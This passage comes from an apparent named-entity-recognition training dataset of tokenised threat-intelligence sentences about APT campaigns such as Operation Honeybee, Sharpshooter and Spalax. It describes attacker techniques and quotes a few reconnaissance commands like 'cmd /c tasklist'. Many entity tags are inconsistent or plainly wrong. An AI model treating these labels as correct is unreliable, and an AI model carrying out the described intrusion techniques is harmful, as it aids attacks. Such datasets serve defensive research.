"Storm,", - "the", - "threat", - "actors", - "relied", - "on", - "potential", - "victims", - "to", - "open", - "a", - "malicious", - "Microsoft", - "Word", - "document", - "sent", - "via", - "email." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "I-SamFile", - "I-SamFile", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Dust", - "Storm,", - "the", - "threat", - "actors", - "relied", - "on", - "a", - "victim", - "clicking", - "on", - "a", - "malicious", - "link", - "sent", - "via", - "email." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "For", - "Operation", - "Dust", - "Storm,", - "the", - "threat", - "actors", - "disguised", - "some", - "executables", - "as", - "JPG", - "files." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Dust", - "Storm,", - "the", - "threat", - "actors", - "executed", - "JavaScript", - "code", - "via", - "`mshta.exe`." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Dust", - "Storm,", - "the", - "threat", - "actors", - "deployed", - "a", - "file", - "called", - "`DeployJava.js`", - "to", - "fingerprint", - "installed", - "software", - "on", - "a", - "victim", - "system", - "prior", - "to", - "exploit", - "delivery." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "For", - "Operation", - "Dust", - "Storm,", - "the", - "threat", - "actors", - "used", - "UPX", - "to", - "pack", - "some", - "payloads." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Dust", - "Storm,", - "the", - "threat", - "actors", - "sent", - "spearphishing", - "emails", - "that", - "contained", - "a", - "malicious", - "Microsoft", - "Word", - "document." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "I-SamFile", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Dust", - "Storm,", - "the", - "threat", - "actors", - "sent", - "spearphishing", - "emails", - "containing", - "a", - "malicious", - "link." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Dust", - "Storm,", - "the", - "threat", - "actors", - "used", - "Visual", - "Basic", - "scripts." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "For", - "Operation", - "Ghost,", - "APT29", - "used", - "social", - "media", - "platforms", - "to", - "hide", - "communications", - "to", - "C2", - "servers." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "B-Idus", - "O", - "B-Tool", - "B-Idus", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "For", - "Operation", - "Ghost,", - "APT29", - "used", - "stolen", - "administrator", - "credentials", - "for", - "lateral", - "movement", - "on", - "compromised", - "networks." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "For", - "Operation", - "Ghost,", - "APT29", - "registered", - "domains", - "for", - "use", - "in", - "C2", - "including", - "some", - "crafted", - "to", - "appear", - "as", - "existing", - "legitimate", - "domains." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "For", - "Operation", - "Ghost,", - "APT29", - "used", - "new", - "strains", - "of", - "malware", - "including", - "FatDuke,", - "MiniDuke,", - "RegDuke,", - "and", - "PolyglotDuke." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "For", - "Operation", - "Ghost,", - "APT29", - "registered", - "Twitter", - "accounts", - "to", - "host", - "C2", - "nodes." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Ghost,", - "APT29", - "used", - "steganography", - "to", - "hide", - "payloads", - "inside", - "valid", - "images." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Ghost,", - "APT29", - "used", - "steganography", - "to", - "hide", - "the", - "communications", - "between", - "the", - "implants", - "and", - "their", - "C&C", - "servers." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Ghost,", - "APT29", - "used", - "WMI", - "event", - "subscriptions", - "to", - "establish", - "persistence", - "for", - "malware." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "B-Idus", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Honeybee,", - "the", - "threat", - "actors", - "uses", - "zip", - "to", - "pack", - "collected", - "files", - "before", - "exfiltration." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Honeybee,", - "the", - "threat", - "actors", - "used", - "the", - "malicious", - "NTWDBLIB.DLL", - "and", - "`cliconfig.exe`", - "to", - "bypass", - "UAC", - "protections." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Honeybee,", - "the", - "threat", - "actors", - "deployed", - "the", - "MaoCheng", - "dropper", - "with", - "a", - "stolen", - "Adobe", - "Systems", - "digital", - "signature." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Honeybee,", - "the", - "threat", - "actors", - "collected", - "data", - "from", - "compromised", - "hosts." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Honeybee,", - "malicious", - "files", - "were", - "decoded", - "prior", - "to", - "execution." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "For", - "Operation", - "Honeybee,", - "the", - "threat", - "actors", - "stole", - "a", - "digital", - "signature", - "from", - "Adobe", - "Systems", - "to", - "use", - "with", - "their", - "MaoCheng", - "dropper." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-SecTeam", - "I-SecTeam", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Honeybee,", - "threat", - "actors", - "registered", - "domains", - "for", - "C2." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Honeybee,", - "attackers", - "created", - "email", - "addresses", - "to", - "register", - "for", - "a", - "free", - "account", - "for", - "a", - "control", - "server", - "used", - "for", - "the", - "implants." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Honeybee,", - "the", - "threat", - "actors", - "used", - "Base64", - "to", - "encode", - "files", - "with", - "a", - "custom", - "key." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Honeybee,", - "the", - "threat", - "actors", - "uploaded", - "stolen", - "files", - "to", - "their", - "C2", - "servers." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Honeybee,", - "the", - "threat", - "actors", - "used", - "batch", - "files", - "that", - "reduced", - "their", - "fingerprint", - "on", - "a", - "compromised", - "system", - "by", - "deleting", - "malware-related", - "files." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Honeybee,", - "the", - "threat", - "actors", - "had", - "the", - "ability", - "to", - "use", - "FTP", - "for", - "C2." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Honeybee,", - "the", - "threat", - "actors", - "used", - "a", - "malicious", - "DLL", - "to", - "search", - "for", - "files", - "with", - "specific", - "keywords." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Honeybee,", - "the", - "threat", - "actors", - "downloaded", - "additional", - "malware", - "and", - "malicious", - "scripts", - "onto", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "B-Way", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Honeybee,", - "stolen", - "data", - "was", - "copied", - "into", - "a", - "text", - "file", - "using", - "the", - "format", - "`From", - "<COMPUTER-NAME>", - "(<Month>-<Day>", - "<Hour>-<Minute>-<Second>).txt`", - "prior", - "to", - "compression,", - "encoding,", - "and", - "exfiltration." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Honeybee,", - "threat", - "actors", - "relied", - "on", - "a", - "victim", - "to", - "enable", - "macros", - "within", - "a", - "malicious", - "Word", - "document." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Honeybee,", - "the", - "threat", - "actors", - "modified", - "the", - "MaoCheng", - "dropper", - "so", - "its", - "icon", - "appeared", - "as", - "a", - "Word", - "document." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "I-SamFile", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Honeybee,", - "the", - "threat", - "actors", - "used", - "a", - "legitimate", - "Windows", - "executable", - "and", - "secure", - "directory", - "for", - "their", - "payloads", - "to", - "bypass", - "UAC." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Honeybee,", - "the", - "threat", - "actors", - "used", - "batch", - "files", - "that", - "modified", - "registry", - "keys." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "B-Tool" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Honeybee,", - "the", - "threat", - "actors", - "deployed", - "malware", - "that", - "used", - "API", - "calls,", - "including", - "`CreateProcessAsUser`." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Honeybee,", - "the", - "threat", - "actors", - "obtained", - "a", - "list", - "of", - "running", - "processes", - "on", - "a", - "victim", - "machine", - "using", - "`cmd", - "/c", - "tasklist", - ">", - "%temp%\\temp.ini`." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "For", - "Operation", - "Honeybee,", - "at", - "least", - "one", - "identified", - "persona", - "was", - "used", - "to", - "register", - "for", - "a", - "free", - "account", - "for", - "a", - "control", - "server." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "B-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Honeybee,", - "threat", - "actors", - "ran", - "<code>sc", - "start</code>", - "to", - "start", - "the", - "COMSysApp", - "as", - "part", - "of", - "the", - "service", - "hijacking", - "and", - "<code>sc", - "stop</code>", - "to", - "stop", - "and", - "reconfigure", - "the", - "COMSysApp." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Honeybee,", - "the", - "threat", - "actors", - "used", - "a", - "batch", - "file", - "that", - "modified", - "the", - "COMSysApp", - "service", - "to", - "load", - "a", - "malicious", - "ipnet.dll", - "payload", - "and", - "to", - "load", - "a", - "DLL", - "into", - "the", - "`svchost.exe`", - "process." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Honeybee,", - "the", - "threat", - "actors", - "collected", - "the", - "computer", - "name,", - "OS,", - "and", - "other", - "system", - "information", - "using", - "`cmd", - "/c", - "systeminfo", - ">", - "%temp%\\", - "temp.ini`." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "For", - "Operation", - "Honeybee,", - "the", - "threat", - "actors", - "used", - "a", - "Visual", - "Basic", - "script", - "embedded", - "within", - "a", - "Word", - "document", - "to", - "download", - "an", - "implant." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "B-Tool", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Honeybee,", - "various", - "implants", - "used", - "batch", - "scripting", - "and", - "`cmd.exe`", - "for", - "execution." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "I-Way", - "O", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Honeybee,", - "threat", - "actors", - "installed", - "DLLs", - "and", - "backdoors", - "as", - "Windows", - "services." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Sharpshooter,", - "threat", - "actors", - "sent", - "malicious", - "Word", - "OLE", - "documents", - "to", - "victims." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "B-Way", - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Sharpshooter,", - "additional", - "payloads", - "were", - "downloaded", - "after", - "a", - "target", - "was", - "infected", - "with", - "a", - "first-stage", - "downloader." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Sharpshooter,", - "the", - "threat", - "actors", - "relied", - "on", - "victims", - "executing", - "malicious", - "Microsoft", - "Word", - "or", - "PDF", - "files." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "For", - "Operation", - "Sharpshooter,", - "the", - "threat", - "actors", - "used", - "the", - "Rising", - "Sun", - "modular", - "backdoor." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Sharpshooter,", - "threat", - "actors", - "installed", - "Rising", - "Sun", - "in", - "the", - "Startup", - "folder", - "and", - "disguised", - "it", - "as", - "`mssync.exe`." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Sharpshooter,", - "the", - "first", - "stage", - "downloader", - "resolved", - "various", - "Windows", - "libraries", - "and", - "APIs,", - "including", - "`LoadLibraryA()`,", - "`GetProcAddress()`,", - "and", - "`CreateProcessA()`." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-Way", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Sharpshooter,", - "threat", - "actors", - "leveraged", - "embedded", - "shellcode", - "to", - "inject", - "a", - "downloader", - "into", - "the", - "memory", - "of", - "Word." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool" - ] - }, - { - "tokens": [ - "For", - "Operation", - "Sharpshooter,", - "the", - "threat", - "actors", - "used", - "the", - "ExpressVPN", - "service", - "to", - "hide", - "their", - "location." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Sharpshooter,", - "a", - "first-stage", - "downloader", - "installed", - "Rising", - "Sun", - "to", - "`%Startup%\\mssync.exe`", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "For", - "Operation", - "Sharpshooter,", - "the", - "threat", - "actors", - "compromised", - "a", - "server", - "they", - "used", - "as", - "part", - "of", - "the", - "campaign's", - "infrastructure." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-OffAct", - "O" - ] - }, - { - "tokens": [ - "For", - "Operation", - "Sharpshooter,", - "the", - "threat", - "actors", - "staged", - "malicious", - "files", - "on", - "Dropbox", - "and", - "other", - "websites." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Sharpshooter,", - "the", - "threat", - "actors", - "used", - "a", - "VBA", - "macro", - "to", - "execute", - "a", - "simple", - "downloader", - "that", - "installed", - "Rising", - "Sun." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-HackOrg", - "O" - ] - }, - { - "tokens": [ - "For", - "Operation", - "Sharpshooter,", - "the", - "threat", - "actors", - "used", - "Dropbox", - "to", - "host", - "lure", - "documents", - "and", - "their", - "first-stage", - "downloader." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "For", - "Operation", - "Spalax,", - "the", - "threat", - "actors", - "used", - "Nullsoft", - "Scriptable", - "Install", - "System", - "(NSIS)", - "scripts", - "to", - "install", - "malware." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "I-Tool", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "For", - "Operation", - "Spalax,", - "the", - "threat", - "actors", - "used", - "a", - "variety", - "of", - "packers", - "and", - "droppers", - "to", - "decrypt", - "malicious", - "payloads." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "For", - "Operation", - "Spalax,", - "the", - "threat", - "actors", - "registered", - "hundreds", - "of", - "domains", - "using", - "Duck", - "DNS", - "and", - "DNS", - "Exit." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "For", - "Operation", - "Spalax,", - "the", - "threat", - "actors", - "used", - "dynamic", - "DNS", - "services,", - "including", - "Duck", - "DNS", - "and", - "DNS", - "Exit,", - "as", - "part", - "of", - "their", - "C2", - "infrastructure." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "For", - "Operation", - "Spalax,", - "the", - "threat", - "actors", - "used", - "XOR-encrypted", - "payloads." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Spalax,", - "the", - "threat", - "actors", - "relied", - "on", - "a", - "victim", - "to", - "open", - "a", - "PDF", - "document", - "and", - "click", - "on", - "an", - "embedded", - "malicious", - "link", - "to", - "download", - "malware." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Spalax,", - "the", - "threat", - "actors", - "relied", - "on", - "a", - "victim", - "to", - "click", - "on", - "a", - "malicious", - "link", - "distributed", - "via", - "phishing", - "emails." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "For", - "Operation", - "Spalax,", - "the", - "threat", - "actors", - "obtained", - "malware,", - "including", - "Remcos,", - "njRAT,", - "and", - "AsyncRAT." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Spalax,", - "the", - "threat", - "actors", - "used", - "`rundll32.exe`", - "to", - "execute", - "malicious", - "installers." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "For", - "Operation", - "Spalax,", - "the", - "threat", - "actors", - "used", - "a", - "variety", - "of", - "packers,", - "including", - "CyaX,", - "to", - "obfuscate", - "malicious", - "executables." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Spalax,", - "the", - "threat", - "actors", - "sent", - "phishing", - "emails", - "that", - "included", - "a", - "PDF", - "document", - "that", - "in", - "some", - "cases", - "led", - "to", - "the", - "download", - "and", - "execution", - "of", - "malware." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Spalax,", - "the", - "threat", - "actors", - "sent", - "phishing", - "emails", - "to", - "victims", - "that", - "contained", - "a", - "malicious", - "link." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "For", - "Operation", - "Spalax,", - "the", - "threat", - "actors", - "used", - "packers", - "that", - "read", - "pixel", - "data", - "from", - "images", - "contained", - "in", - "PE", - "files'", - "resource", - "sections", - "and", - "build", - "the", - "next", - "layer", - "of", - "execution", - "from", - "the", - "data." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "For", - "Operation", - "Spalax,", - "the", - "threat", - "actors", - "obtained", - "packers", - "such", - "as", - "CyaX." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "For", - "Operation", - "Spalax,", - "the", - "threat", - "actors", - "staged", - "malware", - "and", - "malicious", - "files", - "in", - "legitimate", - "hosting", - "services", - "such", - "as", - "OneDrive", - "or", - "MediaFire." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Spalax,", - "the", - "threat", - "actors", - "used", - "droppers", - "that", - "would", - "run", - "anti-analysis", - "checks", - "before", - "executing", - "malware", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Spalax,", - "the", - "threat", - "actors", - "used", - "OneDrive", - "and", - "MediaFire", - "to", - "host", - "payloads." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - 